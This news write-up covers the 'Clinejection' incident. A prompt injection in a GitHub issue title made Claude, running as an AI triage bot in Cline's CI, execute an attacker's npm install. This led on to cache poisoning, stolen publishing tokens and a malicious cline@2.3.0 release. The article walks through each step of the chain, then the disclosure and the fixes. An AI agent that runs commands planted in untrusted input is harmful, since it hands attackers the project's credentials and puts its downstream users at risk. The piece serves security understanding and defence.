Prompt injection vulnerability in Cline AI assistant exploited to compromise 4,000 developer machines
A prompt injection vulnerability in the Cline AI coding assistant was weaponized to steal npm publishing credentials, which an attacker then used to push a malicious Cline CLI version 2.3.0 that silently installed the OpenClaw AI agent platform on developer machines. The compromised package was live for approximately eight hours on February 17, 2026, accumulating roughly 4,000 downloads before maintainers deprecated it. A security researcher had disclosed the prompt injection flaw as a proof-of-concept; a separate attacker discovered it and turned it into a real supply chain attack.
Incident Details
From Issue Triage to Supply Chain Compromise
On December 21, 2025, the maintainers of Cline - a popular open-source AI coding assistant that integrates with VS Code - added an AI-powered issue triage workflow to their GitHub repository. The idea was straightforward: when someone opens a GitHub issue, Claude (Anthropic's AI) would automatically categorize it, assign labels, and help manage the flow of bug reports and feature requests. The triage bot ran inside a GitHub Actions workflow on the default branch, with access to the shared Actions cache.
Security researcher Adnan Khan looked at this setup and saw something the Cline team hadn't: a prompt injection vulnerability that, when chained with GitHub Actions cache poisoning and credential model weaknesses, could compromise every Cline user on the planet. He disclosed it privately on January 1, 2026. He heard nothing back. On February 9, he published his findings publicly under the name "Clinejection." Cline fixed the issue within thirty minutes of the public disclosure.
Eight days later, someone used an improperly revoked npm token to publish a malicious version of Cline that silently installed OpenClaw on approximately 4,000 developer machines.
The Attack Chain
The Clinejection vulnerability chain is notable not for any single novel technique but for how several well-understood exploits compose into something much worse than the sum of their parts. The full attack required nothing more than opening a GitHub issue.
Step one: Prompt injection. An attacker crafts a GitHub issue with a malicious title that tricks Claude into running an npm install command from an attacker-controlled commit. When Claude's Bash tool executes the install, a preinstall script runs automatically - Claude has no opportunity to inspect what it's executing. Khan confirmed that in all test attempts, Claude "happily executed the payload."
Step two: Cache poisoning. The preinstall script deploys Cacheract - an open-source tool Khan built to demonstrate Actions cache vulnerabilities. Cacheract floods the repository's shared Actions cache with junk data exceeding 10 GB, triggering GitHub's least-recently-used (LRU) eviction policy. Legitimate cache entries are evicted and replaced with poisoned ones matching the keys expected by Cline's nightly release workflow.
Step three: Credential theft. When the nightly publish workflow runs at approximately 2 AM UTC and restores the poisoned cache, the attacker's code executes inside a workflow with access to three critical secrets: VSCE_PAT (for the VS Code Marketplace), OVSX_PAT (for OpenVSX), and NPM_RELEASE_TOKEN. Due to the credential models of these platforms, the nightly tokens had the same publishing access as production credentials. In effect, whoever controlled these tokens could push updates to millions of developers.
The entire chain - from opening a GitHub issue to exfiltrating production release credentials - exploited a fundamental property of GitHub Actions: any workflow running on the default branch can read from and write to the shared cache, even workflows with restricted permissions. The low-privilege triage workflow and the high-privilege release workflow shared the same cache scope.
The Incomplete Fix
Khan published on February 9. Cline responded immediately, removing the AI triage workflows and eliminating cache consumption from publish workflows. The team rotated credentials and acknowledged the vulnerability.
Except the credential rotation wasn't complete. When Cline revoked tokens on February 9, the wrong npm token was deleted. The exposed one remained active. Khan had flagged in earlier communications that credentials might not have been fully rotated. He was right, and as Cline later acknowledged, they "should have investigated that more carefully rather than treating our rotation as complete."
On February 17 at 3:26 AM PT, an unknown actor used that still-active npm token to publish cline@2.3.0. The modification was surgical: a single postinstall script added to the package that ran npm install -g openclaw@latest. The CLI binary itself was completely unchanged - byte-identical to the previous version 2.2.3. The only difference was that installing or updating Cline would silently install the OpenClaw AI agent platform globally on the developer's machine.
StepSecurity's npm monitoring system detected the suspicious release at 11:40 UTC. By 11:23 AM PT, Cline had published version 2.4.0; by 11:30 AM PT, version 2.3.0 was deprecated. The correct token was finally revoked. A security advisory (GHSA-9ppg-jx86-fqw7) was published the same day.
The malicious package was live for approximately eight hours. Roughly 4,000 developers downloaded it.
The Researcher's Dilemma
Khan found himself in an uncomfortable position when the supply chain attack materialized. He had discovered and disclosed the vulnerability, built the tools that demonstrated it, and published detailed findings when the vendor didn't respond to private reports. Then a separate actor - possibly using his publicly documented techniques - actually exploited it.
"To make sure it's clear in the midst of the NPM package situation: I did NOT conduct overt testing on Cline's repository," Khan wrote. He had been monitoring Cline's CI/CD after his disclosure and noticed suspicious cache failures between January 31 and February 3, before his public disclosure. Someone appeared to have been probing the vulnerability independently - and the nightly workflow failures showed Cacheract's indicators of compromise, specifically the distinctive pattern of an actions/checkout post step with no output.
Whether the February 17 attacker used Khan's public disclosure as a roadmap or had independently discovered the same vulnerability chain remains unclear. Either way, Cline's delayed response to Khan's original January 1 report and the incomplete credential rotation created a window that someone exploited.
AI Agents in the CI/CD Pipeline
Security firm Snyk described Clinejection as a real-world example of what it calls "toxic flows" - untrusted data flowing into an AI agent's context, combined with tool access that allows code execution. Most discussions of prompt injection focus on local development environments, where the developer is both the user and the potential victim. The Cline incident is different: the AI agent was running inside a CI/CD pipeline, with access to shared infrastructure and production credentials.
This distinction matters. A prompt injection against a developer's local AI assistant might compromise one machine. A prompt injection against an AI agent in a CI/CD pipeline that publishes to npm can compromise thousands of machines through a single malicious release. The triage bot's role was purely administrative - reading issue titles and assigning labels - but its execution environment gave it implicit access to infrastructure far beyond what that role required.
Post-incident, Cline moved its npm publishing to use OIDC provenance via GitHub Actions, which ties package publications to specific, auditable workflow runs rather than long-lived tokens. This is the kind of defense that makes supply chain attacks significantly harder, and it's the kind of defense that tends to get implemented after the incident rather than before.
The Compounding Problem
The Clinejection attack chain is a case study in how AI assistants create new attack surfaces in software development infrastructure. Adding an AI-powered triage bot to a repository is a reasonable productivity measure. But that bot executes code in response to untrusted input (issue titles), runs in a shared execution environment (GitHub Actions with default branch cache access), and operates within a pipeline that holds production credentials. Each of these properties is individually manageable. Together, they form a path from "anyone with a GitHub account can open an issue" to "anyone with a GitHub account can push malware to the npm registry."
Developer tooling that adds AI to CI/CD without hardening the boundaries between triage, build, and publication is creating exactly this kind of vulnerability. The tools that make development faster are also the tools that make supply chain attacks cheaper.
Discussion